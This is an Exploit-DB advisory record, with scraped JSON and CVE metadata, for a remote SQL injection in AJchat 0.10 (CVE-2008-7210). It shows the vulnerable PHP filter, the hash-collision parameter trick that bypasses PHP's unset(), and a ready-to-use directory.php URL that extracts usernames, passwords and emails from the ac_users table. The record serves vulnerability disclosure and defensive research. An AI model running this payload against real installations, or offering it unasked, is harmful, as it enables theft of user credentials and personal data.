ID EDB-ID:4890Type exploitdbReporter Eugene MinaevModified 2008-01-11T00:00:00
Description
AJchat 0.10 unset() bug Remote SQL Injection Vulnerability. CVE-2008-7210. Webapps exploit for php platform
----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]
AJchat Remote Sql Injection using unset() bug
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
<?php
if (isset($_GET["s"])){
$_GET["s"] = strtoupper($_GET["s"]);
if (strlen($_GET["s"])==1 && $_GET["s"]>='A' && $_GET["s"]<='Z'){
// nothing
}else unset($_GET['s']);
}
?>
As we can see , $_GET['s'] can include only A..Z characters , in other way script unset() it.
calc.exe s
5861526=1
5863704=1
directory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# milw0rm.com [2008-01-11]
{"bulletinFamily": "exploit", "id": "EDB-ID:4890", "cvelist": ["CVE-2008-7210"], "modified": "2008-01-11T00:00:00", "lastseen": "2016-01-31T21:01:05", "edition": 1, "sourceData": "----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]\n\n\t\t\t\t\t\t\tAJchat Remote Sql Injection using unset() bug\n\t\t\t\t\t\t\tEugene Minaev underwater@itdefence.ru \n\t\t\t\t___________________________________________________________________\n\t\t\t____/ __ __ _______________________ _______ _______________ \\ \\ \\\n\t\t\t/ .\\ / /_// // / \\ \\/ __ \\ /__/ /\n\t\t\t/ / /_// /\\ / / / / /___/\n\t\t\t\\/ / / / / /\\ / / /\n\t\t\t/ / \\/ / / / / /__ //\\\n\t\t\t\\ / ____________/ / \\/ __________// /__ // / \n\t\t\t/\\\\ \\_______/ \\________________/____/ 2007 /_//_/ // //\\\n\t\t\t\\ \\\\ // // /\n\t\t\t.\\ \\\\ -[ ITDEFENCE.ru Security advisory ]- // // / . \n\t\t\t. \\_\\\\________[________________________________________]_________//_//_/ . .\n\t\t\t\n\t\t<?php\n\t\tif (isset($_GET[\"s\"])){\n\t\t$_GET[\"s\"] = strtoupper($_GET[\"s\"]);\n\t\tif (strlen($_GET[\"s\"])==1 && $_GET[\"s\"]>='A' && $_GET[\"s\"]<='Z'){\n\t\t// nothing\n\t\t}else unset($_GET['s']);\n\t\t} \n\t\t?>\n\t\t\n\t\tAs we can see , $_GET['s'] can include only A..Z characters , in other way script unset() it.\n\t\t\n\t\tcalc.exe s\n\t\t5861526=1\n\t\t5863704=1\n\t\t\n\t\tdirectory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1\n\n----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]\n\n# milw0rm.com [2008-01-11]\n", "published": "2008-01-11T00:00:00", "href": "https://www.exploit-db.com/exploits/4890/", "osvdbidlist": ["58130"], "reporter": "Eugene Minaev", "hash": "efb7dbbdd00b53169b292011d0ef56f0d2519f4a542bf0dceaa8505f6eeef009", "title": "AJchat 0.10 unset bug Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "AJchat 0.10 unset() bug Remote SQL Injection Vulnerability. CVE-2008-7210. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4890/", "viewCount": 1, "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2008-7210", "type": "cve", "title": "CVE-2008-7210", "description": "directory.php in AJchat 0.10 allows remote attackers to bypass input validation and conduct SQL injection attacks via a numeric parameter with a value matching the s parameter's hash value, which prevents the associated $_GET[\"s\"] variable from being unset. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in AJChat.", "published": "2009-09-11T12:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7210", "cvelist": ["CVE-2008-7210"], "lastseen": "2017-09-29T14:26:25"}]}}
